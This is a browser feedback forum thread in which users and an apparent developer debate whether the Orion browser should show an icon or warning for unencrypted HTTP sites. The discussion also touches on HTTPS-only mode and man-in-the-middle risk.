6

I have to agree with a side comment @nlydv made on his suggestion: https://orionfeedback.org/d/1050-minimal-url-display-option-domain-curpath

Unencrypted lock side note

Seems like Orion just hides the lock icon for http websites. As someone technically knowledgable to know what it means, I personally like that as a design choice, but for most people I think some sort of alternative indicator for plain http sites should probably be visible.

In that case I'd suggest lock.slash.fill (i.e. 􀎣 ) to clearly indicate the lack of security in a given window.

…and as a small related feature, I'd also suggest flagging / calling out such "HTTP-only" sites in the Window menu.

WHY?

It would help surface the importance of secure browsing to non-tech users and remind/promote the value of your "Automatic HTTPS upgrade" setting, and by extension Orion's strong focus on respecting (and promoting!) user security and privacy.

  • Vlad replied to this.

    transeunt Note that for most internet users saying something is not secure is an immediate alarm.

    Also large number of users does not make a distinction between a mere connection is not secure vs a website is not secure.

    Imagine that this site did not have https. If you show the lock.slash.file icon the user may be turned off even though

    • site is safe
    • connection is not, but there is nothing on this site to be consumed in a way that requires encrypted connection anyways

    In other words many http sites are perfectly safe and secure for the user.

    Thoughts?

      Yes, all good points — in practice this suggestion is probably going too far, esp as you say HTTP is legitimate for content-only sites not offering login etc.

      …and there's not going to be an easy way for Orion to pick out any sites that could/should be running in HTTPS over HTTP.

      Instead I guess the best approach to nudge users into safer territory is to default "Automatic HTTPS upgrade" on (as I think you are) and hope for the best…! 👍

        a month later

        Chrome and Firefox now have an HTTPS-only mode. That would be a nice additional option instead of just having automatic HTTPS upgrades. I also don't see an issue with branding HTTP only websites as "non secure", that's how other browsers are doing it for many years now. It might not always be an actual issue of course, but unencrypted connections inside your web browser can be an opening of attack to any MITM regardless of what site you're actually trying to visit or if the content of the site you're trying to use is confidential in any way or not.

        Edit: Didn't talk about security of a website at all, Vlad. But anyway...

        • Vlad replied to this.
          7 days later

          jei4 Security of the website has nothing to do with the security of the connection. A site can be https and malicious for the user, and http and perfectly fine. Closing this for lack of a concrete next step.

              16 days later

              Jumping in to clarify my original side note:

              I didn’t necessarily mean to suggest that a plain HTTP indicator ought to flag a site as “not secure” per se… but even a non-aggressive/opinionated icon would probably make for better UX overall.

              Otherwise, for example, a user looking for some lock icon to ensure their connection is encrypted may conclude that the absence of any such icon indicates the “default” state (i.e. no alerts, warnings, peculiarities, etc.), and that if the site was unencrypted, surely the browser would say so somewhere.

              In other words, it would take conscious observation by the user to learn when/why a lock icon is or is not displayed before being able to reliably draw conclusions on the connection state with a simple glance towards the URL bar.

              • Vlad replied to this.
                16 days later

                nlydv Security associated with https indication is misleading to the user. Most users will never be a target of a MITM attack.

                I feel that the whole "https is secure" phrase thing was invented by leading browsers (all of them ad-tech supported) as a way to distract the users from what is really happening on those https sites that are labeled as 'secure' - a tremendous amounts of privacy invasion and tracking. Not sure that we want to be a part of that, need to think more about it.

                    11 days later

                    Vlad Fair enough. I tend to share a critical view of the whole CA system/industry. Even still, there always exists at least one omnipresent “MITM” to shield against in the form of your ISP and this obviously also has much deeper security/privacy implications in certain parts of the world and for certain types of people.

                    Then again I’m sure it wouldn’t be hard to go on forever debating the nuances of a number of potential scenarios that a typical user could care less about.

                        No one is typing